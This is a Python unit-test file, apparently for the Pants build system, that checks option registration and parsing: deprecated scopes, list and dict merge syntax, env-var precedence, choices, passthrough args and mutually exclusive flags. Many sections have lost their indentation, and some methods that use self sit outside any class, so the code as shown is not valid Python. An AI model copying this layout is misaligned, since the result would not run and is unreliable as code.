        deprecated_options_scope_removal_version = "9999.9.9.dev0"
        qux = StrOption(default=None, help="")

    def register(opts: Options) -> None:
        opts.register(Subsystem1.options_scope, "--foo")
        opts.register(Subsystem1.options_scope, "--bar")
        opts.register(Subsystem1.options_scope, "--baz")
        opts.register(Subsystem2.options_scope, "--qux")

    opts = create_options(
        [GLOBAL_SCOPE],
        register,
        ["--new1-baz=vv"],
        extra_scope_infos=[Subsystem1.get_scope_info(), Subsystem2.get_scope_info()],
        config={
            Subsystem1.options_scope: {"foo": "xx"},
            # Values under the deprecated scope name are still picked up.
            Subsystem1.deprecated_options_scope: {
                "foo": "yy",
                "bar": "zz",
                "baz": "ww",
                "qux": "uu",
            },
        },
    )
    caplog.clear()
    vals1 = opts.for_scope(Subsystem1.options_scope)
    assert len(caplog.records) == 1
    assert Subsystem1.deprecated_options_scope in caplog.text
    assert "foo" in caplog.text
    # Deprecated scope takes precedence at equal rank, but new scope takes precedence at higher
    # rank.
    assert vals1.foo == "yy"
    assert vals1.bar == "zz"
    assert vals1.baz == "vv"
    caplog.clear()
    vals2 = opts.for_scope(Subsystem2.options_scope)
    assert len(caplog.records) == 1
    assert Subsystem1.deprecated_options_scope in caplog.text
    assert "qux" in caplog.text
    assert vals2.qux == "uu"
def test_scope_deprecation_default_config_section(caplog) -> None:
    """A value from the DEFAULT config section must not trigger deprecated-scope warnings."""

    class Subsystem1(Subsystem):
        options_scope = "new"
        deprecated_options_scope = "deprecated"
        deprecated_options_scope_removal_version = "9999.9.9.dev0"

    def register(opts: Options) -> None:
        opts.register(Subsystem1.options_scope, "--foo")

    options = create_options(
        [GLOBAL_SCOPE],
        register,
        [],
        extra_scope_infos=[Subsystem1.get_scope_info()],
        config={"DEFAULT": {"foo": "aa"}, Subsystem1.options_scope: {"foo": "xx"}},
    )
    caplog.clear()
    # The scope-specific value wins over DEFAULT, and nothing is logged.
    foo_value = options.for_scope(Subsystem1.options_scope).foo
    assert foo_value == "xx"
    assert not caplog.records
# ----------------------------------------------------------------------------------------
# Legacy Unittest TestCase.
# ----------------------------------------------------------------------------------------
class OptionsTest(unittest.TestCase):
@staticmethod
def _create_config(
config: dict[str, dict[str, str]] | None = None,
config2: dict[str, dict[str, str]] | None = None,
) -> Config:
return Config.load(
[
FileContent("test_config.toml", toml.dumps(config or {}).encode()),
FileContent("test_config2.toml", toml.dumps(config2 or {}).encode()),
]
)
def _parse(
self,
*,
flags: str = "",
env: dict[str, str] | None = None,
config: dict[str, dict[str, Any]] | None = None,
config2: dict[str, dict[str, Any]] | None = None,
bootstrap_option_values=None,
) -> Options:
args = ["./pants", *shlex.split(flags)]
options = Options.create(
env=env or {},
config=self._create_config(config, config2),
known_scope_infos=OptionsTest._known_scope_infos,
args=args,
bootstrap_option_values=bootstrap_option_values,
)
self._register(options)
return options
_known_scope_infos = [
ScopeInfo(scope)
for scope in (
GLOBAL_SCOPE,
"anotherscope",
"compile",
"compile.java",
"stale",
"test",
"test.junit",
"passconsumer",
"simple",
"simple-dashed",
"scoped.a.bit",
"scoped.and-dashed",
"fromfile",
"fingerprinting",
"enum-opt",
"separate-enum-opt-scope",
"other-enum-scope",
)
]
    class SomeEnumOption(Enum):
        """Enum used to exercise enum-typed option registration and parsing below."""

        a_value = "a-value"
        another_value = "another-value"
        yet_another = "yet-another"
        one_more = "one-more"
    def _register(self, options):
        """Register the full set of options (types, scopes, flavors) the tests rely on."""

        def register_global(*args, **kwargs):
            # Shorthand for registering in the global scope.
            options.register(GLOBAL_SCOPE, *args, **kwargs)

        register_global("--verbose", type=bool, help="Verbose output.")
        register_global("--num", type=int, default=99)
        # NB: `-l` on the global scope is the only short arg we allow. We need to make sure it
        # works.
        register_global("-l", "--level", type=str, help="What level to use.")
        # Test that we can use the same name on the global scope and another scope.
        options.register("anotherscope", "--num", type=int, default=99)
        register_global("--y", type=list, member_type=int)
        register_global(
            "--v2", help="Two-letter long-form option, used to test option name suggestions."
        )
        register_global("--config-override", type=list)
        register_global("--pants-foo")
        register_global("--bar-baz")
        register_global("--store-true-flag", type=bool)
        # Choices.
        register_global("--str-choices", choices=["foo", "bar"])
        register_global("--int-choices", choices=[42, 99], type=list, member_type=int)
        # Custom types (defaults may be given as parseable strings or native values).
        register_global("--listy", type=list, member_type=int, default="[1, 2, 3]")
        register_global("--dicty", type=dict, default='{"a": "b"}')
        register_global(
            "--dict-listy", type=list, member_type=dict, default='[{"a": 1, "b": 2}, {"c": 3}]'
        )
        register_global("--targety", type=target_option, default="//:a")
        register_global(
            "--target-listy", type=list, member_type=target_option, default=["//:a", "//:b"]
        )
        register_global("--filey", type=file_option, default=None)
        register_global("--file-listy", type=list, member_type=file_option)
        register_global(
            "--shell-str-listy",
            type=list,
            member_type=shell_str,
            default="--default1 --default2=test",
        )
        # Implicit value.
        register_global("--implicit-valuey", default="default", implicit_value="implicit")
        # Mutually exclusive options.
        register_global("--mutex-foo", mutually_exclusive_group="mutex")
        register_global("--mutex-bar", mutually_exclusive_group="mutex")
        register_global("--mutex-baz", mutually_exclusive_group="mutex")
        register_global("--new-name")
        register_global("--old-name", mutually_exclusive_group="new_name")
        # Test mutually exclusive options within a scope.
        options.register("stale", "--mutex-a", mutually_exclusive_group="scope_mutex")
        options.register("stale", "--mutex-b", mutually_exclusive_group="scope_mutex")
        options.register("stale", "--crufty-old", mutually_exclusive_group="crufty_new")
        options.register("stale", "--crufty-new")
        # For scoped fingerprintable test.
        options.register("compile", "--modifycompile")
        options.register("compile", "--modifylogs", fingerprint=False)
        options.register(
            "compile",
            "--modifypassthrough",
            passthrough=True,
            type=list,
            member_type=str,
        )
        # For scoped env vars test.
        options.register("simple", "--spam")
        options.register("simple-dashed", "--spam")
        options.register("scoped.a.bit", "--spam")
        options.register("scoped.and-dashed", "--spam")
        # For fromfile test.
        options.register("fromfile", "--string")
        options.register("fromfile", "--intvalue", type=int)
        options.register("fromfile", "--dictvalue", type=dict)
        options.register("fromfile", "--listvalue", type=list)
        options.register("fromfile", "--passthru-listvalue", type=list, passthrough=True)
        options.register("fromfile", "--appendvalue", type=list, member_type=int)
        # For fingerprint tests.
        register_global("--implicitly-fingerprinted")
        register_global("--explicitly-fingerprinted", fingerprint=True)
        register_global("--explicitly-not-fingerprinted", fingerprint=False)
        register_global("--implicitly-not-daemoned")
        register_global("--explicitly-not-daemoned", daemon=False)
        register_global("--explicitly-daemoned", daemon=True)
        # For enum tests.
        options.register("enum-opt", "--some-enum", type=self.SomeEnumOption)
        options.register(
            "other-enum-scope", "--some-list-enum", type=list, member_type=self.SomeEnumOption
        )
        options.register(
            "other-enum-scope",
            "--some-list-enum-with-default",
            type=list,
            member_type=self.SomeEnumOption,
            default=[self.SomeEnumOption.yet_another],
        )
        # For testing the default value.
        options.register(
            "separate-enum-opt-scope",
            "--some-enum-with-default",
            default=self.SomeEnumOption.a_value,
            type=self.SomeEnumOption,
        )
def test_env_var_of_type_int(self) -> None:
create_options_object = partial(
Options.create,
config=self._create_config(),
known_scope_infos=OptionsTest._known_scope_infos,
args=shlex.split("./pants"),
)
options = create_options_object(env={"PANTS_FOO_BAR": "123"})
options.register(GLOBAL_SCOPE, "--foo-bar", type=int)
assert 123 == options.for_global_scope().foo_bar
options = create_options_object(env={"PANTS_FOO_BAR": "['123','456']"})
options.register(GLOBAL_SCOPE, "--foo-bar", type=list, member_type=int)
assert [123, 456] == options.for_global_scope().foo_bar
    def test_arg_scoping(self) -> None:
        """Flags apply to the scope they follow; remaining args become target specs."""
        # Some basic smoke tests.
        options = self._parse(flags="--verbose")
        assert options.for_global_scope().verbose is True
        options = self._parse(flags="--verbose compile path/to/tgt")
        assert ["path/to/tgt"] == options.specs
        assert options.for_global_scope().verbose is True
        # The short form -l and the long form --level set the same option.
        options = self._parse(flags="-linfo")
        assert options.for_global_scope().level == "info"
        options = self._parse(flags="--level=info compile path/to/tgt")
        assert ["path/to/tgt"] == options.specs
        assert options.for_global_scope().level == "info"
        # Unknown flags are rejected at parse time.
        with pytest.raises(ParseError):
            self._parse(flags="--unregistered-option compile").for_global_scope()
        # Scoping of different values of options with the same name in different scopes.
        options = self._parse(flags="--num=11 anotherscope --num=22")
        assert 11 == options.for_global_scope().num
        assert 22 == options.for_scope("anotherscope").num
        # Test list-typed option: flag values append after config-supplied values.
        global_options = self._parse(config={"DEFAULT": {"y": ["88", "-99"]}}).for_global_scope()
        assert [88, -99] == global_options.y
        global_options = self._parse(
            flags="--y=5 --y=-6 --y=77", config={"DEFAULT": {"y": ["88", "-99"]}}
        ).for_global_scope()
        assert [88, -99, 5, -6, 77] == global_options.y
        global_options = self._parse().for_global_scope()
        assert [] == global_options.y
        global_options = self._parse(
            env={"PANTS_CONFIG_OVERRIDE": "['123','456']"}
        ).for_global_scope()
        assert ["123", "456"] == global_options.config_override
        # An empty string is a valid list member.
        global_options = self._parse(env={"PANTS_CONFIG_OVERRIDE": "['']"}).for_global_scope()
        assert [""] == global_options.config_override
        # A flag-supplied list literal replaces the config-supplied default.
        global_options = self._parse(
            flags="--listy='[1, 2]'", config={"DEFAULT": {"listy": "[3, 4]"}}
        ).for_global_scope()
        assert [1, 2] == global_options.listy
        # Test dict-typed option.
        global_options = self._parse(flags='--dicty=\'{"c": "d"}\'').for_global_scope()
        assert {"c": "d"} == global_options.dicty
        # Test list-of-dict-typed option.
        global_options = self._parse(
            flags='--dict-listy=\'[{"c": "d"}, {"e": "f"}]\''
        ).for_global_scope()
        assert [{"c": "d"}, {"e": "f"}] == global_options.dict_listy
        # Test target-typed option.
        global_options = self._parse().for_global_scope()
        assert "//:a" == global_options.targety
        global_options = self._parse(flags="--targety=//:foo").for_global_scope()
        assert "//:foo" == global_options.targety
        # Test list-of-target-typed option.
        global_options = self._parse(
            flags='--target-listy=\'["//:foo", "//:bar"]\''
        ).for_global_scope()
        assert ["//:foo", "//:bar"] == global_options.target_listy
        # Test file-typed option.
        with temporary_file_path() as fp:
            global_options = self._parse(flags=f'--filey="{fp}"').for_global_scope()
            assert fp == global_options.filey
        # Test list-of-file-typed option.
        with temporary_file_path() as fp1:
            with temporary_file_path() as fp2:
                global_options = self._parse(
                    flags=f'--file-listy="{fp1}" --file-listy="{fp2}"'
                ).for_global_scope()
                assert [fp1, fp2] == global_options.file_listy
    def test_list_option(self) -> None:
        """List options merge default, config, env and flags, honoring +append/-filter syntax."""

        def check(
            *,
            expected: list[int],
            flags: str = "",
            env_val: str | None = None,
            config_val: str | None = None,
            config2_val: str | None = None,
        ) -> None:
            # Assert the final value of --listy given a value from each source.
            env = {"PANTS_GLOBAL_LISTY": env_val} if env_val else None
            config = {"GLOBAL": {"listy": config_val}} if config_val else None
            config2 = {"GLOBAL": {"listy": config2_val}} if config2_val else None
            global_options = self._parse(
                flags=flags, env=env, config=config, config2=config2
            ).for_global_scope()
            assert global_options.listy == expected

        # The registered default for --listy.
        default = [1, 2, 3]
        check(expected=default)
        # Appending to the default.
        check(flags="--listy=4", expected=[*default, 4])
        check(flags="--listy=4 --listy=5", expected=[*default, 4, 5])
        check(flags="--listy=+[4,5]", expected=[*default, 4, 5])
        # Filtering from the default.
        check(flags="--listy=-[2]", expected=[1, 3])
        # Replacing the default.
        check(flags="--listy=[4,5]", expected=[4, 5])
        # Appending across env, config and flags (in the right order).
        check(
            flags="--listy=+[8,9]",
            env_val="+[6,7]",
            config_val="+[4,5],+[45]",
            expected=[*default, 4, 5, 45, 6, 7, 8, 9],
        )
        check(
            config_val="+[4,5],-[4]",
            expected=[*default, 5],
        )
        # Appending and filtering across env, config and flags (in the right order).
        check(
            flags="--listy=-[1,5,6]",
            env_val="+[6,7]",
            config_val="+[4,5]",
            config2_val="+[99]",
            expected=[2, 3, 4, 99, 7],
        )
        check(
            flags="--listy=+[8,9]",
            env_val="-[4,5]",
            config_val="+[4,5],-[3]",
            expected=[1, 2, 8, 9],
        )
        # Appending a value from a fromfile (@path expands to the file's contents).
        with temporary_file(binary_mode=False) as fp:
            fp.write("-[3]")
            fp.close()
            check(
                flags="--listy=+[8,9]",
                env_val="-[4,5]",
                config_val="+[4,5]",
                config2_val=f"@{fp.name}",
                expected=[1, 2, 8, 9],
            )
        # Overwriting from env, then appending and filtering.
        check(
            flags="--listy=+[8,9],-[6]",
            env_val="[6,7]",
            config_val="+[4,5]",
            expected=[7, 8, 9],
        )
        # Overwriting from config, then appending.
        check(
            flags="--listy=+[8,9]",
            env_val="+[6,7]",
            config_val="[4,5]",
            config2_val="-[4]",
            expected=[5, 6, 7, 8, 9],
        )
        # Overwriting from flags.
        check(
            flags="--listy=[8,9]",
            env_val="+[6,7]",
            config_val="+[4,5],-[8]",
            expected=[8, 9],
        )
        # Filtering all instances of repeated values.
        check(
            flags="--listy=-[5]",
            config_val="[1, 2, 5, 3, 4, 5, 6, 5, 5]",
            expected=[1, 2, 3, 4, 6],
        )
        # Filtering a value even though it was appended again at a higher rank.
        check(
            flags="--listy=+[4]",
            env_val="-[4]",
            config_val="+[4,5]",
            expected=[*default, 5],
        )
        # Filtering a value even though it was appended again at the same rank.
        check(
            env_val="-[4],+[4]",
            config_val="+[4,5]",
            expected=[*default, 5],
        )
        # Overwriting cancels filters.
        check(env_val="[4]", config_val="-[4]", expected=[4])
    def test_dict_list_option(self) -> None:
        """Lists of dicts append bare/+ values to the default; [...] replaces wholesale."""

        def check(
            *,
            expected: list[dict[str, int]],
            flags: str = "",
            env_val: str | None = None,
            config_val: str | None = None,
        ) -> None:
            env = {"PANTS_GLOBAL_DICT_LISTY": env_val} if env_val else None
            config = {"GLOBAL": {"dict_listy": config_val}} if config_val else None
            global_options = self._parse(flags=flags, env=env, config=config).for_global_scope()
            assert global_options.dict_listy == expected

        # The registered default for --dict-listy.
        default = [{"a": 1, "b": 2}, {"c": 3}]
        one_element_appended = [*default, {"d": 4, "e": 5}]
        two_elements_appended = [*one_element_appended, {"f": 6}]
        replaced = [{"d": 4, "e": 5}, {"f": 6}]
        check(expected=default)
        # Flags: bare dict values and +[...] append; [...] replaces.
        check(flags='--dict-listy=\'{"d": 4, "e": 5}\'', expected=one_element_appended)
        check(
            flags='--dict-listy=\'{"d": 4, "e": 5}\' --dict-listy=\'{"f": 6}\'',
            expected=two_elements_appended,
        )
        check(
            flags='--dict-listy=\'+[{"d": 4, "e": 5}, {"f": 6}]\'',
            expected=two_elements_appended,
        )
        check(flags='--dict-listy=\'[{"d": 4, "e": 5}, {"f": 6}]\'', expected=replaced)
        # Env values follow the same append/replace rules.
        check(env_val='{"d": 4, "e": 5}', expected=one_element_appended)
        check(env_val='+[{"d": 4, "e": 5}, {"f": 6}]', expected=two_elements_appended)
        check(env_val='[{"d": 4, "e": 5}, {"f": 6}]', expected=replaced)
        # And so do config values.
        check(config_val='{"d": 4, "e": 5}', expected=one_element_appended)
        check(config_val='+[{"d": 4, "e": 5}, {"f": 6}]', expected=two_elements_appended)
        check(config_val='[{"d": 4, "e": 5}, {"f": 6}]', expected=replaced)
def test_target_list_option(self) -> None:
def check(
*,
expected: list[str],
flags: str = "",
env_val: str | None = None,
config_val: str | None = None,
) -> None:
env = {"PANTS_GLOBAL_TARGET_LISTY": env_val} if env_val else None
config = {"GLOBAL": {"target_listy": config_val}} if config_val else None
global_options = self._parse(flags=flags, env=env, config=config).for_global_scope()
assert global_options.target_listy == expected
default = ["//:a", "//:b"]
specified_args = ["//:c", "//:d"]
all_args = [*default, *specified_args]
check(expected=default)
check(flags="--target-listy=//:c --target-listy=//:d", expected=all_args)
check(flags='--target-listy=\'+["//:c", "//:d"]\'', expected=all_args)
check(flags='--target-listy=\'["//:c", "//:d"]\'', expected=specified_args)
check(env_val="//:c", expected=[*default, "//:c"])
check(env_val='+["//:c", "//:d"]', expected=all_args)
check(env_val='["//:c", "//:d"]', expected=specified_args)
check(config_val="//:c", expected=[*default, "//:c"])
check(config_val='+["//:c", "//:d"]', expected=all_args)
check(config_val='["//:c", "//:d"]', expected=specified_args)
    def test_shell_str_list(self) -> None:
        """shell_str members are shlexed into multiple list elements from flags/env/config."""

        def check(
            *,
            expected: list[str],
            flags: str = "",
            env_val: str | None = None,
            config_val: str | None = None,
        ) -> None:
            env = {"PANTS_GLOBAL_SHELL_STR_LISTY": env_val} if env_val else None
            config = {"GLOBAL": {"shell_str_listy": config_val}} if config_val else None
            global_options = self._parse(flags=flags, env=env, config=config).for_global_scope()
            assert global_options.shell_str_listy == expected

        # The registered default is the shlexed form of "--default1 --default2=test".
        default = ["--default1", "--default2=test"]
        specified_args = ["arg1", "arg2=foo", "--arg3"]
        all_args = [*default, *specified_args]
        check(expected=default)
        # Flags: each value is shlexed and appended; +[...] appends; [...] replaces.
        check(
            flags="--shell-str-listy='arg1 arg2=foo' --shell-str-listy='--arg3'", expected=all_args
        )
        check(flags="""--shell-str-listy='+["arg1 arg2=foo", "--arg3"]'""", expected=all_args)
        check(flags="""--shell-str-listy='["arg1 arg2=foo", "--arg3"]'""", expected=specified_args)
        # Env values follow the same rules.
        check(env_val="arg1 arg2=foo --arg3", expected=all_args)
        check(env_val='+["arg1 arg2=foo", "--arg3"]', expected=all_args)
        check(env_val='["arg1 arg2=foo", "--arg3"]', expected=specified_args)
        # Config values too.
        check(config_val="arg1 arg2=foo --arg3", expected=all_args)
        check(config_val='+["arg1 arg2=foo", "--arg3"]', expected=all_args)
        check(config_val='["arg1 arg2=foo", "--arg3"]', expected=specified_args)
    def test_dict_option(self) -> None:
        """Dict options replace the default by default; the +{...} syntax merges into it."""

        def check(
            *,
            expected: dict[str, str],
            flags: str = "",
            config_val: str | None = None,
            config2_val: str | None = None,
        ) -> None:
            config = {"GLOBAL": {"dicty": config_val}} if config_val else None
            config2 = {"GLOBAL": {"dicty": config2_val}} if config2_val else None
            global_options = self._parse(
                flags=flags, config=config, config2=config2
            ).for_global_scope()
            assert global_options.dicty == expected

        # The registered default for --dicty.
        default = {"a": "b"}
        specified_args = {"c": "d"}
        all_args = {**default, **specified_args}
        check(expected=default)
        check(flags='--dicty=\'{"c": "d"}\'', expected=specified_args)
        check(flags='--dicty=\'+{"c": "d"}\'', expected=all_args)
        check(config_val='{"c": "d"}', expected=specified_args)
        check(config_val='+{"c": "d"}', expected=all_args)
        # +{...} extensions accumulate across config files and flags.
        check(
            config_val='+{"c": "d"}',
            config2_val='+{"e": "f"}',
            flags='--dicty=\'+{"g": "h"}\'',
            expected={**all_args, "e": "f", "g": "h"},
        )
        check(
            config_val='+{"c": "d"}',
            flags='--dicty=\'+{"e": "f"}\'',
            expected={**all_args, "e": "f"},
        )
        # Check that highest rank wins if we have multiple values for the same key.
        check(config_val='+{"a": "b+", "c": "d"}', expected={"a": "b+", "c": "d"})
        check(
            config_val='+{"a": "b+", "c": "d"}',
            flags='--dicty=\'+{"a": "b++"}\'',
            expected={"a": "b++", "c": "d"},
        )
def test_defaults(self) -> None:
# Hard-coded defaults.
options = self._parse(flags="anotherscope")
assert 99 == options.for_global_scope().num
assert 99 == options.for_scope("anotherscope").num
# Get defaults from config and environment.
config = {"DEFAULT": {"num": "88"}, "anotherscope": {"num": "77"}}
options = self._parse(flags="anotherscope", config=config)
assert 88 == options.for_global_scope().num
assert 77 == options.for_scope("anotherscope").num
env = {"PANTS_ANOTHERSCOPE_NUM": "55"}
options = self._parse(flags="anotherscope", env=env, config=config)
assert 88 == options.for_global_scope().num
assert 55 == options.for_scope("anotherscope").num
def test_choices(self) -> None:
options = self._parse(flags="--str-choices=foo")
assert "foo" == options.for_global_scope().str_choices
options = self._parse(config={"DEFAULT": {"str_choices": "bar"}})
assert "bar" == options.for_global_scope().str_choices
with pytest.raises(ParseError):
options = self._parse(flags="--str-choices=baz")
options.for_global_scope()
with pytest.raises(ParseError):
options = self._parse(config={"DEFAULT": {"str_choices": "baz"}})
options.for_global_scope()
options = self._parse(flags="--int-choices=42 --int-choices=99")
assert [42, 99] == options.for_global_scope().int_choices
def test_parse_dest(self) -> None:
assert "thing" == Parser.parse_dest("--thing")
assert "other_thing" == Parser.parse_dest("--thing", dest="other_thing")
def test_validation(self) -> None:
def assertError(expected_error, *args, **kwargs):
with pytest.raises(expected_error):
options = Options.create(
args=["./pants"],
env={},
config=self._create_config(),
known_scope_infos=[global_scope()],
)
options.register(GLOBAL_SCOPE, *args, **kwargs)
options.for_global_scope()
assertError(NoOptionNames)
assertError(OptionNameDoubleDash, "badname")
assertError(OptionNameDoubleDash, "-badname")
assertError(InvalidKwarg, "--foo", badkwarg=42)
assertError(ImplicitValIsNone, "--foo", implicit_value=None)
assertError(BooleanOptionNameWithNo, "--no-foo", type=bool)
assertError(MemberTypeNotAllowed, "--foo", member_type=int)
assertError(MemberTypeNotAllowed, "--foo", type=dict, member_type=int)
assertError(InvalidMemberType, "--foo", type=list, member_type=set)
assertError(InvalidMemberType, "--foo", type=list, member_type=list)
assertError(HelpType, "--foo", help=())
assertError(HelpType, "--foo", help=("Help!",))
def test_implicit_value(self) -> None:
def check(*, flag: str = "", expected: str) -> None:
options = self._parse(flags=flag)
assert options.for_global_scope().implicit_valuey == expected
check(expected="default")
check(flag="--implicit-valuey", expected="implicit")
check(flag="--implicit-valuey=explicit", expected="explicit")
def test_shadowing(self) -> None:
options = Options.create(
env={},
config=self._create_config(),
known_scope_infos=[global_scope(), task("bar"), intermediate("foo"), task("foo.bar")],
args=["./pants"],
)
options.register("", "--opt1")
options.register("foo", "-o", "--opt2")
def test_is_known_scope(self) -> None:
options = self._parse()
for scope_info in self._known_scope_infos:
assert options.is_known_scope(scope_info.scope)
assert not options.is_known_scope("nonexistent_scope")
    def test_file_spec_args(self) -> None:
        """--spec-files reads extra target specs from a file and merges them with CLI specs."""
        with temporary_file(binary_mode=False) as tmp:
            tmp.write(
                dedent(
                    """
                    foo
                    bar
                    """
                )
            )
            tmp.flush()
            # Note that we prevent loading a real pants.toml during get_bootstrap_options().
            flags = f'--spec-files={tmp.name} --pants-config-files="[]" compile morx:tgt fleem:tgt'
            bootstrapper = OptionsBootstrapper.create(
                env={}, args=shlex.split(f"./pants {flags}"), allow_pantsrc=False
            )
            bootstrap_options = bootstrapper.bootstrap_options.for_global_scope()
            options = self._parse(flags=flags, bootstrap_option_values=bootstrap_options)
            # Specs from the file and from the command line are combined.
            sorted_specs = sorted(options.specs)
            assert ["bar", "fleem:tgt", "foo", "morx:tgt"] == sorted_specs
def test_passthru_args_subsystems_and_goals(self):
# Test that passthrough args are applied.
options = Options.create(
env={},
config=self._create_config(),
known_scope_infos=[global_scope(), task("test"), subsystem("passconsumer")],
args=["./pants", "test", "target", "--", "bar", "--baz", "@dont_fromfile_expand_me"],
)
options.register(
"passconsumer", "--passthing", passthrough=True, type=list, member_type=str
)
assert ["bar", "--baz", "@dont_fromfile_expand_me"] == options.for_scope(
"passconsumer"
).passthing
def test_at_most_one_goal_with_passthru_args(self):
with pytest.raises(Options.AmbiguousPassthroughError) as exc:
Options.create(
env={},
config=self._create_config(),
known_scope_infos=[global_scope(), task("test"), task("fmt")],
args=["./pants", "test", "fmt", "target", "--", "bar", "--baz"],
)
assert (
"Specifying multiple goals (in this case: ['test', 'fmt']) along with passthrough args"
+ " (args after `--`) is ambiguous."
) in str(exc.value)
    def test_passthru_args_not_interpreted(self):
        """Passthrough args bypass shlexing, unlike values from config or regular flags."""
        # Test that passthrough args are not interpreted.
        options = Options.create(
            env={},
            config=self._create_config(
                {"consumer": {"shlexed": ["from config"], "string": ["from config"]}}
            ),
            known_scope_infos=[global_scope(), task("test"), subsystem("consumer")],
            args=[
                "./pants",
                "--consumer-shlexed=a",
                "--consumer-string=b",
                "test",
                "--",
                "[bar]",
                "multi token from passthrough",
            ],
        )
        options.register(
            "consumer", "--shlexed", passthrough=True, type=list, member_type=shell_str
        )
        options.register("consumer", "--string", passthrough=True, type=list, member_type=str)
        # shell_str members shlex config values ("from config" -> two tokens),
        # but passthrough values stay whole.
        assert [
            "from",
            "config",
            "a",
            "[bar]",
            "multi token from passthrough",
        ] == options.for_scope("consumer").shlexed
        assert ["from config", "b", "[bar]", "multi token from passthrough"] == options.for_scope(
            "consumer"
        ).string
def test_global_scope_env_vars(self) -> None:
    """Env-var precedence for a global option: PANTS_GLOBAL_X beats PANTS_X beats X."""

    def check_pants_foo(expected_val, env):
        val = self._parse(env=env).for_global_scope().pants_foo
        assert expected_val == val

    check_pants_foo(
        "AAA", {"PANTS_GLOBAL_PANTS_FOO": "AAA", "PANTS_PANTS_FOO": "BBB", "PANTS_FOO": "CCC"}
    )
    check_pants_foo("BBB", {"PANTS_PANTS_FOO": "BBB", "PANTS_FOO": "CCC"})
    check_pants_foo("CCC", {"PANTS_FOO": "CCC"})
    check_pants_foo(None, {})
    # Check that an empty string is distinct from no value being specified.
    check_pants_foo("", {"PANTS_PANTS_FOO": "", "PANTS_FOO": "CCC"})

    # A global option that doesn't begin with 'pants-': Setting BAR_BAZ should have no effect.
    def check_bar_baz(expected_val, env):
        val = self._parse(env=env).for_global_scope().bar_baz
        assert expected_val == val

    check_bar_baz(
        "AAA", {"PANTS_GLOBAL_BAR_BAZ": "AAA", "PANTS_BAR_BAZ": "BBB", "BAR_BAZ": "CCC"}
    )
    check_bar_baz("BBB", {"PANTS_BAR_BAZ": "BBB", "BAR_BAZ": "CCC"})
    check_bar_baz(None, {"BAR_BAZ": "CCC"})
    check_bar_baz(None, {})
def test_scoped_env_vars(self) -> None:
    """Scoped env vars: dots and dashes in the scope map to underscores in the var name."""
    cases = [
        ("simple", "PANTS_SIMPLE_SPAM"),
        ("simple-dashed", "PANTS_SIMPLE_DASHED_SPAM"),
        ("scoped.a.bit", "PANTS_SCOPED_A_BIT_SPAM"),
        ("scoped.and-dashed", "PANTS_SCOPED_AND_DASHED_SPAM"),
    ]
    for scope, env_var in cases:
        parsed = self._parse(env={env_var: "value"}).for_scope(scope)
        assert parsed.spam == "value"
def test_enum_option_type_parse_error(self) -> None:
    """An invalid enum value raises ParseError listing the valid choices."""
    with pytest.raises(ParseError) as err:
        self._parse(flags="enum-opt --some-enum=invalid-value").for_scope("enum-opt")
    expected_msg = (
        "Invalid choice 'invalid-value'."
        " Choose from: a-value, another-value, yet-another, one-more"
    )
    assert expected_msg in str(err.value)
def test_non_enum_option_type_parse_error(self) -> None:
    """A value that cannot be coerced to the declared type raises ParseError."""
    with pytest.raises(ParseError) as err:
        self._parse(flags="--num=not-a-number").for_global_scope()
    expected_msg = (
        "Error applying type 'int' to option value 'not-a-number': invalid literal for int()"
    )
    assert expected_msg in str(err.value)
def test_mutually_exclusive_options(self) -> None:
    """Ensure error is raised when mutual exclusive options are given together."""

    def assert_mutually_exclusive_raised(
        *,
        flags: str,
        scope: str | None = None,
        env: dict[str, str] | None = None,
        config: dict[str, dict[str, str]] | None = None,
    ) -> None:
        # Values are resolved lazily, so the error surfaces in for_scope()/
        # for_global_scope(), not in _parse() itself.
        with pytest.raises(MutuallyExclusiveOptionError):
            options = self._parse(flags=flags, env=env, config=config)
            if scope:
                options.for_scope(scope)
            else:
                options.for_global_scope()

    # Flag-vs-flag conflicts.
    assert_mutually_exclusive_raised(flags="--mutex-foo=foo --mutex-bar=bar")
    assert_mutually_exclusive_raised(flags="--mutex-foo=foo --mutex-baz=baz")
    assert_mutually_exclusive_raised(flags="--mutex-bar=bar --mutex-baz=baz")
    assert_mutually_exclusive_raised(flags="--mutex-foo=foo --mutex-bar=bar --mutex-baz=baz")
    # NB: the original code repeated this exact call twice; the duplicate was dropped.
    assert_mutually_exclusive_raised(flags="--new-name=foo --old-name=bar")
    assert_mutually_exclusive_raised(flags="stale --mutex-a=foo --mutex-b=bar", scope="stale")
    assert_mutually_exclusive_raised(
        flags="stale --crufty-new=foo --crufty-old=bar", scope="stale"
    )
    # Flag-vs-env conflicts.
    assert_mutually_exclusive_raised(flags="--mutex-foo=foo", env={"PANTS_MUTEX_BAR": "bar"})
    assert_mutually_exclusive_raised(flags="--new-name=foo", env={"PANTS_OLD_NAME": "bar"})
    assert_mutually_exclusive_raised(
        flags="stale --mutex-a=foo",
        env={"PANTS_STALE_MUTEX_B": "bar"},
        scope="stale",
    )
    assert_mutually_exclusive_raised(
        flags="stale --crufty-new=foo",
        env={"PANTS_STALE_CRUFTY_OLD": "bar"},
        scope="stale",
    )
    # Flag-vs-config conflicts.
    assert_mutually_exclusive_raised(
        flags="--mutex-foo=foo",
        config={"GLOBAL": {"mutex_bar": "bar"}},
    )
    assert_mutually_exclusive_raised(
        flags="--new-name=foo",
        config={"GLOBAL": {"old_name": "bar"}},
    )
    assert_mutually_exclusive_raised(
        flags="stale --mutex-a=foo",
        config={"stale": {"mutex_b": "bar"}},
        scope="stale",
    )
    assert_mutually_exclusive_raised(
        flags="stale --crufty-old=foo",
        config={"stale": {"crufty_new": "bar"}},
        scope="stale",
    )

    # Mutexes should not impact the `dest`. We spot check that here.
    def assert_option_set(
        flags: str,
        option: str,
        expected: str | None,
    ) -> None:
        options = self._parse(flags=flags).for_global_scope()
        assert getattr(options, option) == expected

    assert_option_set("--mutex-foo=orz", "mutex_foo", "orz")
    assert_option_set("--mutex-foo=orz", "mutex_bar", None)
    assert_option_set("--mutex-foo=orz", "mutex_baz", None)
    assert_option_set("--mutex-bar=orz", "mutex_bar", "orz")
def test_complete_scopes(self) -> None:
    """complete_scopes adds deprecated-scope aliases and rejects duplicate scopes."""

    class OptCls:
        deprecated_options_scope = "deprecated"

    plain = Options.complete_scopes([ScopeInfo("foo"), ScopeInfo("bar")])
    assert set(plain) == {ScopeInfo("foo"), ScopeInfo("bar")}

    with_alias = Options.complete_scopes([ScopeInfo("foo"), ScopeInfo("bar", OptCls)])
    assert set(with_alias) == {
        ScopeInfo("foo"),
        ScopeInfo("bar", OptCls),
        ScopeInfo("deprecated", OptCls),
    }

